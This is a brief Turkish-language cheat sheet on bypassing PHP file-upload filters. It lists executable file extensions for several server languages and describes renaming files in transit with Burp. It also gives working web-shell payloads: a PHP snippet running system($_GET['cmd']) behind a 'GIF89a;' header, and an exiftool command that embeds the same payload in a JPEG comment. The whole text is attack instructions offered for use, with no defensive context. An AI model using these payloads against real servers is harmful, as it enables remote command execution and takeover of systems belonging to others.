Php Upload Bypass ExifTool

 Dosya isminin değiştirilmesi.

Dosya uzantıları sistemin istediği şekilde ayarlanır. Post işlemi yapılınca araya burp vb araçlar ile girilerek örnek shell.php.jpg olarak belirtilen dosyanın uzantısı shell.php olarak değiştirilir ve sisteme post edilir.

php phtml, .php, .php3, .php4, .php5, and .inc

asp asp, .aspx

perl .pl, .pm, .cgi, .lib

jsp .jsp, .jspx, .jsw, .jsv, and .jspf

Coldfusion .cfm, .cfml, .cfc, .dbm

GIF89a;

Dosyanın başına GIF89a; eklenerek type olarak farklı algılanması sağlanır.

GIF89a;
<?
system($_GET['cmd']);//veya bu alana shell kodlarınız
?>

In image

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg

Exiftool aracı ile jpg dosyası manipüle edilir. İçerinsine php kodları gömülür ve dosya ismi değiştirilir. mv lo.jpg lo.php.jpg